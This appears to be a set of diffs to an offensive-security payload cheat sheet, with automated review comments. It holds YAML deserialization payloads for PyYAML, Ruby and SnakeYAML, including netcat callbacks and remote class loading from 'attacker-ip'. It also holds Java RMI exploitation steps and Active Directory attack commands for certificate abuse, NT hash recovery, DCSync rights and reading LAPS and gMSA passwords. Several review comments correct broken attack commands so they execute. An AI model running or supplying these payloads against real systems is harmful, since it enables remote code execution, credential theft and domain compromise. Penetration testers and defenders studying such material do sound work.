* [Exploit](#exploit)
|
||||
* [PyYAML](#pyyaml)
|
||||
* [ruamel.yaml](#ruamelyaml)
|
||||
* [Ruby](#ruby)
|
||||
* [SnakeYAML](#snakeyaml)
|
||||
* [References](#references)
|
||||
|
||||
## Tools
|
||||
|
||||
* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator)
|
||||
* [artsploit/yaml-payload](https://github.com/artsploit/yaml-payload) - A tiny project for generating SnakeYAML deserialization payloads
|
||||
* [mbechler/marshalsec](https://github.com/mbechler/marshalsec)
|
||||
|
||||
## Exploit
|
||||
|
||||
### PyYAML
|
||||
|
||||
```yaml
|
||||
!!python/object/apply:time.sleep [10]
|
||||
!!python/object/apply:builtins.range [1, 10, 1]
|
||||
!!python/object/apply:os.system ["nc 10.10.10.10 4242"]
|
||||
!!python/object/apply:os.popen ["nc 10.10.10.10 4242"]
|
||||
!!python/object/new:subprocess [["ls","-ail"]]
|
||||
!!python/object/new:subprocess.check_output [["ls","-ail"]]
|
||||
```
|
||||
|
||||
```yaml
|
||||
!!python/object/apply:subprocess.Popen
|
||||
- ls
|
||||
```
|
||||
|
||||
```yaml
|
||||
!!python/object/new:str
|
||||
state: !!python/tuple
|
||||
- 'print(getattr(open("flag\x2etxt"), "read")())'
|
||||
- !!python/object/new:Warning
|
||||
state:
|
||||
update: !!python/name:exec
|
||||
```
|
||||
|
||||
Since PyYaml version 6.0, the default loader for ```load``` has been switched to SafeLoader mitigating the risks against Remote Code Execution.
|
||||
[PR fixing the vulnerabily](https://github.com/yaml/pyyaml/issues/420)
|
||||
|
||||
The vulnerable sinks are now ```yaml.unsafe_load``` and ```yaml.load(input, Loader=yaml.UnsafeLoader)```
|
||||
|
||||
```
|
||||
with open('exploit_unsafeloader.yml') as file:
|
||||
data = yaml.load(file,Loader=yaml.UnsafeLoader)
|
||||
```
|
||||
|
||||
## Ruamel.yaml
|
||||
|
||||
## Ruby
|
||||
|
||||
```ruby
|
||||
---
|
||||
- !ruby/object:Gem::Installer
|
||||
i: x
|
||||
- !ruby/object:Gem::SpecFetcher
|
||||
i: y
|
||||
- !ruby/object:Gem::Requirement
|
||||
requirements:
|
||||
!ruby/object:Gem::Package::TarReader
|
||||
io: &1 !ruby/object:Net::BufferedIO
|
||||
io: &1 !ruby/object:Gem::Package::TarReader::Entry
|
||||
read: 0
|
||||
header: "abc"
|
||||
debug_output: &1 !ruby/object:Net::WriteAdapter
|
||||
socket: &1 !ruby/object:Gem::RequestSet
|
||||
sets: !ruby/object:Net::WriteAdapter
|
||||
socket: !ruby/module 'Kernel'
|
||||
method_id: :system
|
||||
git_set: sleep 600
|
||||
method_id: :resolve
|
||||
```
|
||||
|
||||
## SnakeYAML
|
||||
|
||||
```yaml
|
||||
!!javax.script.ScriptEngineManager [
|
||||
!!java.net.URLClassLoader [[
|
||||
!!java.net.URL ["http://attacker-ip/"]
|
||||
]]
|
||||
]
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Python Yaml Deserialization - hacktricks.xyz][https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization]
|
||||
* [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13][https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf]
|
||||
* [PyYAML Documentation](https://pyyaml.org/wiki/PyYAMLDocumentation)
|
||||
* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
|
||||
* [[CVE-2019-20477]- 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - @_j0lt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)
|
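Review bot: `!!python/object/new:subprocess [["ls","-ail"]]` and `!!python/object/new:subprocess.check_output [...]` will not work: `object/new` calls `cls.__new__` and needs a class, but `subprocess` is a module and `check_output` a function; use `object/apply` as the neighbouring lines do (the `subprocess.Popen` block below is the working form). The claim that PyYAML 6.0 switched `load`'s default to SafeLoader is inaccurate: 6.0 made the `Loader` argument mandatory, so `yaml.load(data)` raises a TypeError, while FullLoader and UnsafeLoader remain selectable; rewrite that sentence and fix `vulnerabily`. The snippet under it lacks `import yaml` and a language tag. The two references at the bottom use `][` instead of `](`, so they do not render as links. `## Ruamel.yaml` is an empty section listed in the summary; fill it or drop it. The Ruby block duplicates Ruby.md; a link would do.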
@ -48,6 +48,10 @@ http://foo.bar/accessPage?menuitem=12
|
||||
* [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789)
|
||||
* [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661)
|
||||
|
||||
## Labs
|
||||
|
||||
* [Insecure direct object references](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references)
|
||||
|
||||
## References
|
||||
|
||||
* [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
|
||||
|
1401
Insecure Source Code Management/Files/github-dorks.txt
Normal file
@ -287,6 +287,15 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
|
||||
* CVE-2019-20933/CVE-2020-28637 - Blank password vulnerability
|
||||
* CVE-2020-28042 - Null signature vulnerability
|
||||
|
||||
## Labs
|
||||
|
||||
* [JWT authentication bypass via unverified signature](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature)
|
||||
* [JWT authentication bypass via flawed signature verification](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification)
|
||||
* [JWT authentication bypass via weak signing key](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-weak-signing-key)
|
||||
* [JWT authentication bypass via jwk header injection](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injection)
|
||||
* [JWT authentication bypass via jku header injection](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection)
|
||||
* [JWT authentication bypass via kid header path traversal](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal)
|
||||
|
||||
## References
|
||||
|
||||
- [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
|
||||
|
@ -1,25 +1,27 @@
|
||||
# Java RMI
|
||||
|
||||
> The attacker can host a MLet file and instruct the JMX service to load MBeans from the remote host.
|
||||
> Exposing a weak configured Java Remote Method Invocation (RMI) service can lead to several ways to achieve RCE.
|
||||
> One such attack is to host an MLet file and instruct the JMX service to load MBeans from the remote host which can be carried out
|
||||
> using the tools mjet or sjet. remote-method-guesser is a more recent tool which bundles enumeration of RMI services together
|
||||
> with a summary of currently known attack techniques.
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Detection](#detection)
|
||||
* [Exploitation](#exploitation)
|
||||
* [Requirements](#requirements)
|
||||
* [Detection](#detection)
|
||||
* [Remote Command Execution](#remote-command-execution)
|
||||
* [RCE using sjet/mjet](#rce-using-sjet-or-mjet)
|
||||
* [References](#references)
|
||||
|
||||
## Exploitation
|
||||
## Tools
|
||||
|
||||
### Requirements
|
||||
- Jython
|
||||
- The JMX server can connect to a http service that is controlled by the attacker
|
||||
- JMX authentication is not enabled
|
||||
- [sjet](https://github.com/siberas/sjet)
|
||||
- [mjet](https://github.com/mogwailabs/mjet)
|
||||
- [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
|
||||
|
||||
## Detection
|
||||
|
||||
### Detection
|
||||
|
||||
Using [nmap](https://nmap.org/):
|
||||
```powershell
|
||||
$ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v
|
||||
1089/tcp open java-rmi Java RMI
|
||||
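Review bot: after this hunk `## Detection` is immediately followed by `### Detection` with nothing between them; if both survive, drop the nested one. The summary still nests `Requirements` and `Detection` under `Exploitation`, but Detection is now a top-level section and Requirements sits under `RCE using sjet or mjet`, so the outline no longer mirrors the headings. `a http service` should be `an HTTP service` (it occurs twice in this merge), and the nmap block is fenced ```powershell for a Unix shell session.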
@ -33,7 +35,45 @@ $ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TA
|
||||
| javax.management.remote.rmi.RMIServerImpl_Stub
|
||||
```
|
||||
|
||||
### Remote Command Execution
|
||||
Using [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser):
|
||||
```bash
|
||||
$ rmg scan 172.17.0.2 --ports 0-65535
|
||||
[+] Scanning 6225 Ports on 172.17.0.2 for RMI services.
|
||||
[+]
|
||||
[+] [HIT] Found RMI service(s) on 172.17.0.2:40393 (DGC)
|
||||
[+] [HIT] Found RMI service(s) on 172.17.0.2:1090 (Registry, DGC)
|
||||
[+] [HIT] Found RMI service(s) on 172.17.0.2:9010 (Registry, Activator, DGC)
|
||||
[+] [6234 / 6234] [#############################] 100%
|
||||
[+]
|
||||
[+] Portscan finished.
|
||||
```
|
||||
|
||||
```bash
|
||||
$ rmg enum 172.17.0.2 9010
|
||||
[+] RMI registry bound names:
|
||||
[+]
|
||||
[+] - plain-server2
|
||||
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
|
||||
[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff7, 9040809218460289711]
|
||||
[+] - legacy-service
|
||||
[+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
|
||||
[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ffc, 4854919471498518309]
|
||||
[+] - plain-server
|
||||
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
|
||||
[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff8, 6721714394791464813]
|
||||
[...]
|
||||
```
|
||||
|
||||
## Exploitation
|
||||
|
||||
### RCE using sjet or mjet
|
||||
|
||||
#### Requirements
|
||||
- Jython
|
||||
- The JMX server can connect to a http service that is controlled by the attacker
|
||||
- JMX authentication is not enabled
|
||||
|
||||
#### Remote Command Execution
|
||||
|
||||
The attack involves the following steps:
|
||||
* Starting a web server that hosts the MLet and a JAR file with the malicious MBeans
|
||||
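Review bot: the new `### Remote Command Execution` subsection under Detection shows only `rmg scan` and `rmg enum` output, i.e. discovery and enumeration, not command execution; title it `Enumeration` (or similar) and keep the RCE heading for the sjet/mjet steps so the two headings do not collide. A sentence stating that `172.17.0.2` and `iinsecure.dev` in the sample output are the tool's demo environment, not defaults, would avoid confusion.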
@ -59,5 +99,6 @@ jython mjet.py TARGET_IP TARGET_PORT command super_secret shell
|
||||
|
||||
## References
|
||||
|
||||
* [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH - 28 APR 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)
|
||||
* [JMX RMI – MULTIPLE APPLICATIONS RCE - Red Timmy Security - 26th March 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi-–-multiple-applications-remote-code-execution.pdf)
|
||||
* [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH, 28 April 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)
|
||||
* [JMX RMI – MULTIPLE APPLICATIONS RCE - Red Timmy Security, 26 March 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi-–-multiple-applications-remote-code-execution.pdf)
|
||||
* [remote-method-guesser - BHUSA 2021 Arsenal - Tobias Neitzel, 15 August 2021](https://www.slideshare.net/TobiasNeitzel/remotemethodguesser-bhusa2021-arsenal)
|
||||
|
@ -62,7 +62,6 @@
|
||||
- [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
|
||||
- [Using impacket](#using-impacket)
|
||||
- [Using Rubeus](#using-rubeus)
|
||||
- [UnPAC The Hash](#unpac-the-hash)
|
||||
- [Capturing and cracking Net-NTLMv1/NTLMv1 hashes](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes)
|
||||
- [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes)
|
||||
- [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying)
|
||||
@ -82,8 +81,10 @@
- [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2)
- [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
- [ESC9 - No Security Extension](#esc9---no-security-extension)
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
- [Pass-The-Certificate](#pass-the-certificate)
- [UnPAC The Hash](#unpac-the-hash)
- [Shadow Credentials](#shadow-credentials)
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
- [Abusing DNS Admins Group](#abusing-dns-admins-group)
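Review bot: the unchanged `[ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ]` entry carries a trailing space inside the link text; since this block is being touched to add the ESC9, UnPAC The Hash and Shadow Credentials entries, drop the space so the item renders like its neighbours.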
@ -112,6 +113,7 @@
- [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049)
- [PrivExchange attack](#privexchange-attack)
- [SCCM Deployment](#sccm-deployment)
- [SCCM Network Access Accounts](#sccm-network-access-accounts)
- [WSUS Deployment](#wsus-deployment)
- [RODC - Read Only Domain Controller Compromise](#rodc---read-only-domain-controller-compromise)
- [PXE Boot image attack](#pxe-boot-image-attack)
@ -257,6 +259,8 @@ Use the correct collector
* Collect more data for certificates exploitation using Certipy
```ps1
certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound
certipy find 'corp.local/john:Passw0rd@dc.corp.local' -old-bloodhound
certipy find 'corp.local/john:Passw0rd@dc.corp.local' -vulnerable -hide-admins -username user@domain -password Password123
```

Then import the zip/json files into the Neo4J database and query them.
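Review bot: the third `certipy find` line supplies credentials twice, once inside the target string (`'corp.local/john:Passw0rd@dc.corp.local'`) and again through `-username user@domain -password Password123`; keep a single form so the reader knows which pair is actually used. A one-line comment on how the added `-old-bloodhound` output differs from `-bloodhound` would also help, since the sentence below only says to import the zip/json files.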
@ -717,7 +721,7 @@ Requirements:

#### samAccountName spoofing

> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a TGS to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid TGS for the domain controller.
> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a ST to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid ST for the domain controller.

**Requirements**
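Review bot: two consistency issues in the rewritten line. The dollar sign is escaped as `'\$'` three times but left bare in "appending a '$'"; escape all four or none. And "request a ST" / "a valid ST" should be "an ST" when the abbreviation is read letter by letter; the same "a ST" form appears in the other TGS-to-ST edits of this commit, so it is worth a single search-and-replace pass.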
@ -1666,7 +1670,7 @@ Mitigations:

### Pass-the-Ticket Silver Tickets

Forging a TGS require machine account password (key) or NTLM hash of the service account.
Forging a Service Ticket (ST) require machine account password (key) or NT hash of the service account.

```powershell
# Create a ticket for the service
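Review bot: "Forging a Service Ticket (ST) require ..." keeps the subject-verb mismatch of the old line; make it "requires". Switching "NTLM hash" to "NT hash" is the right correction.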
@ -1703,7 +1707,7 @@ Mitigations:

> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)

Any valid domain user can request a kerberos ticket (TGS) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
Any valid domain user can request a kerberos ticket (ST) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.


* [GetUserSPNs](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py) from Impacket Suite
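Review bot: "kerberos" in the rewritten sentence should be capitalised. In the unchanged quote just above, the MSDN link points at the `fr-fr` locale of the documentation; dropping that path segment gives a locale-neutral URL that the docs site redirects to the reader's language.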
@ -1915,21 +1919,6 @@ root@kali:~$ klist
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
```

### UnPAC The Hash

* Windows
```ps1
# request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.
C:/> Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
```
* Linux
```ps1
# obtain a TGT by validating a PKINIT pre-authentication
$ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"

# use the session key to recover the NT hash
$ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'
```

### Capturing and cracking Net-NTLMv1/NTLMv1 hashes

@ -2236,7 +2225,7 @@ secretsdump.py -k -no-pass target.lab.local
* Find ADCS Server
* `crackmapexec ldap domain.lab -u username -p password -M adcs`
* `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`
* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`, `certutil -dump`

#### ESC1 - Misconfigured Certificate Templates

@ -2474,6 +2463,45 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
certipy relay -ca 172.16.19.100
```


#### ESC9 - No Security Extension

Requirements:
* `StrongCertificateBindingEnforcement` set to `1` (default) or `0`
* Certificate contains the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value
* Certificate specifies `Any Client` authentication EKU
* `GenericWrite` over any account A to compromise any account B

**Scenario**

John@corp.local has **GenericWrite** over Jane@corp.local, and we want to compromise Administrator@corp.local.
Jane@corp.local is allowed to enroll in the certificate template ESC9 that specifies the **CT_FLAG_NO_SECURITY_EXTENSION** flag in the **msPKI-Enrollment-Flag** value.

* Obtain the hash of Jane with Shadow Credentials (using our GenericWrite)
```ps1
certipy shadow auto -username John@corp.local -p Passw0rd -account Jane
```
* Change the **userPrincipalName** of Jane to be Administrator. :warning: leave the `@corp.local` part
```ps1
certipy account update -username John@corp.local -password Passw0rd -user Jane -upn Administrator
```
* Request the vulnerable certificate template ESC9 from Jane's account.
```ps1
certipy req -username jane@corp.local -hashes ... -ca corp-DC-CA -template ESC9
# userPrincipalName in the certificate is Administrator
# the issued certificate contains no "object SID"
```
* Restore userPrincipalName of Jane to Jane@corp.local.
```ps1
certipy account update -username John@corp.local -password Passw0rd -user Jane@corp.local
```
* Authenticate with the certificate and receive the NT hash of the Administrator@corp.local user.
```ps1
certipy auth -pfx administrator.pfx -domain corp.local
# Add -domain <domain> to your command line since there is no domain specified in the certificate.
```


#### Certifried CVE-2022-26923

> An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege.
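Review bot: the "Restore userPrincipalName of Jane" step runs `certipy account update ... -user Jane@corp.local` with no `-upn` argument, so it does not undo the earlier `-upn Administrator` change; mirror the step that set it, i.e. `-user Jane -upn Jane@corp.local`. Two smaller points in the same block: ":warning: leave the `@corp.local` part" is ambiguous (the command shows the suffix being omitted, so say "leave out"), and the Requirements list names the weak `StrongCertificateBindingEnforcement` values without stating the hardened setting, which is the one line a defender reading this section needs.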
@ -2516,6 +2544,8 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101

#### Pass-The-Certificate

> Pass the Certificate in order to get a TGT, this technique is used in "UnPAC the Hash" and "Shadow Credential"

* Windows
```ps1
# Information about a cert file
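Review bot: the new description says "Shadow Credential" while the section it refers to is titled "Shadow Credentials"; use the plural so the cross-reference matches the heading. The capitalisation of "UnPAC the Hash" also differs from the "UnPAC The Hash" heading used elsewhere in this commit.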
@ -2523,6 +2553,11 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101

# From a Base64 PFX
Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show

# Grant DCSync rights to an user
./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --sid <user_SID>
# To restore
./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --restore restoration_file.txt
```
* Linux
```ps1
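Review bot: the `# From a Base64 PFX` comment no longer matches the command under it, which passes a file path (`/certificate:cert.pfx`); the Base64 variant is the one in the UnPAC The Hash block (`/certificate:"BASE64_CERTIFICATE"`), so reword this comment to "From a PFX file". In the added PassTheCert lines, "to an user" should be "to a user", and the `--restore restoration_file.txt` command would benefit from a comment saying where that file comes from, since nothing in the hunk says so.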
@ -2534,8 +2569,30 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101

# PFX certificate (file) + password (string, optionnal)
gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"

# Using Certipy
certipy auth -pfx "PATH_TO_PFX_CERT" -dc-ip 'dc-ip' -username 'user' -domain 'domain'
certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
```

### UnPAC The Hash

Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate.

* Windows
```ps1
# Request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.
Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
```
* Linux
```ps1
# Obtain a TGT by validating a PKINIT pre-authentication
$ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"

# Use the session key to recover the NT hash
$ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'
```


### Shadow Credentials

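Review bot: `export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key ...` in the moved Linux block never runs `getnthash.py`: `export` treats every following word as a variable name, rejects `getnthash.py` as an invalid identifier, and the command is not executed. Either drop `export` so the assignment scopes to the one command (`KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key ...`) or put `export KRB5CCNAME="TGT_CCACHE_FILE"` on its own line before the command. Also "optionnal" in the PFX comment should be "optional", and "for an User" in the UnPAC intro should be "for a user".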
@ -2593,10 +2650,10 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
# Get a TGT using the newly acquired certificate via PKINIT
proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR

# Get a TGS for the target account
# Get a ST (service ticket) for the target account
proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v

# Utilize the TGS for future activity
# Utilize the ST for future activity
export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache
proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab
```
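Review bot: the ticket written by `gets4uticket.py` is saved as `administrator_tgs.ccache`, but the next step exports `KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache`, so the final `wmiexec.py` line points at a file the block never created. While the comments are being renamed from TGS to ST, align the two file names (for instance `administrator_st.ccache` in both places) so the sequence runs as written.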
@ -2694,7 +2751,7 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr
* using bloodyAD:
`bloodyAD.py --host [DC IP] -d DOMAIN -u hacker -p MyPassword123 addObjectToGroup UserToAdd 'GROUP NAME'`

* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a TGS, then grab its hash and kerberoast it.
* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a Service Ticket (ST), then grab its hash and kerberoast it.
```powershell
# Check for interesting permissions on accounts:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
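Review bot: `?{$_.IdentinyReferenceName -match "RDPUsers"}` has a typo in the property name; PowerView's `Invoke-ACLScanner` emits `IdentityReferenceName`, so the filter as written matches nothing and the line silently returns no results. Fix it here while the bullet above it is being edited.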
@ -2799,10 +2856,10 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi
* On Linux:
```bash
# Give DCSync right to the principal identity
bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B addDomainSync user2
bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2

# Remove right after DCSync
bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B delDomainSync user2
bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2 False
```

* WriteDACL on Group
@ -2810,6 +2867,13 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi
Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1
net group "INTERESTING_GROUP" User1 /add /domain
```
Or
```powershell
bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp

# Remove right
bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp False
```

#### WriteOwner

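Review bot: the added `bloodyAD.py ... setGenericAll ...` block is fenced as ```powershell although it is a Linux command line, like the bloodyAD block a few lines above that correctly uses ```bash; the same mismatch is introduced in the new bloodyAD fences of the WriteOwner, LAPS and ReadGMSAPassword hunks below. A bare "Or" line between two fences would also read better as "Or, with bloodyAD:" so the reader knows what the alternative is before the code starts.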
@ -2818,6 +2882,10 @@ An attacker can update the owner of the target object. Once the object owner has
```powershell
Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'
```
Or
```powershell
bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setOwner devil_user1 target_object
```

This ACE can be abused for an Immediate Scheduled Task attack, or for adding a user to the local admin group.

@ -2829,6 +2897,10 @@ An attacker can read the LAPS password of the computer account this ACE applies
```powershell
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
```
Or for a given computer
```powershell
bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes LAPS_PC$ ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
```


#### ReadGMSAPassword
@ -2843,6 +2915,10 @@ $mp = $gmsa.'msDS-ManagedPassword'
# Decode the data structure using the DSInternals module
ConvertFrom-ADManagedPasswordBlob $mp
```
Or
```powershell
python bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes gmsaAccount$ msDS-ManagedPassword
```

#### ForceChangePassword

@ -3060,14 +3136,14 @@ mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /
